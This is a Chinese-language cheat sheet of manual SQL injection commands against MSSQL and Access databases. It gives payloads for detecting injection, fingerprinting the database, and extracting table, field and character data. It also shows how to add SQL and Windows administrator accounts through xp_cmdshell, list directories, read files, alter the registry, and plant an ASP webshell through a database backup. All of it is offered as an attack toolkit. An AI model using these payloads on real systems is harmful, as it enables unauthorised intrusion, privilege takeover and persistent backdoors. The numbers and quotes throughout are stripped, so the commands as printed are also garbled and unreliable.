手动方式SQL注入脚本命令之精华版

时间:2023-03-10 06:33:18
手动方式SQL注入脚本命令之精华版
.判断是否有注入;and = ;and =
  .初步判断是否是mssql ;and user>   .注入参数是字符and [查询条件] and =   .搜索时没过滤参数的and [查询条件] and %=   .判断数据库系统   ;and (select count(*) from sysobjects)> mssql   ;and (select count(*) from msysobjects)> access   .猜数据库 ;and (select Count(*) from [数据库名])>   .猜字段 ;and (select Count(字段名) from 数据库名)>   .猜字段中记录长度 ;and (select top len(字段名) from 数据库名)>   .()猜字段的ascii值(access)   ;and (select top asc(mid(字段名,,)) from 数据库名)>   ()猜字段的ascii值(mssql)   ;and (select top unicode(substring(字段名,,)) from 数据库名)>   .测试权限结构(mssql)   ;and =(select IS_SRVROLEMEMBER(sysadmin));--   ;and =(select IS_SRVROLEMEMBER(serveradmin));--   ;and =(select IS_SRVROLEMEMBER(setupadmin));--   ;and =(select IS_SRVROLEMEMBER(securityadmin));--   ;and =(select IS_SRVROLEMEMBER(diskadmin));--   ;and =(select IS_SRVROLEMEMBER(bulkadmin));--   ;and =(select IS_MEMBER(db_owner));--   .添加mssql和系统的帐户   ;exec master.dbo.sp_addlogin username;--
  ;exec master.dbo.sp_password null,username,password;--   ;exec master.dbo.sp_addsrvrolemember sysadmin username;--   ;exec master.dbo.xp_cmdshell net user username password   /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add;--   ;exec master.dbo.xp_cmdshell net user username password /add;--   ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;--   .()遍历目录   ;create table dirs(paths varchar(), id int)   ;insert dirs exec master.dbo.xp_dirtree c:   ;and (select top paths from dirs)>   ;and (select top paths from dirs where paths not in(上步得到的paths))>)   ()遍历目录   ;create table temp(id nvarchar(),num1 nvarchar(),num2 nvarchar(),num3 nvarchar());--
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表   ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树构   ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容   .mssql中的存储过程   xp_regenumvalues 注册表根键, 子键   ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值   xp_regread 根键,子键,键值名   ;exec xp_regread   HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值   xp_regwrite 根键,子键, 值名, 值类型, 值   值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   ;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表   xp_regdeletevalue 根键,子键,值名   exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值   xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值   .mssql的backup创建webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=c:l.asp;   .mssql内置函数   ;and (select @@version)> 获得Windows的版本号   ;and user_name()=dbo 判断当前系统的连接用户是不是sa   ;and (select user_name())> 爆当前系统的连接用户   ;and (select db_name())> 得到当前连接的数据库   .简洁的webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=g:wwwtestl.asp;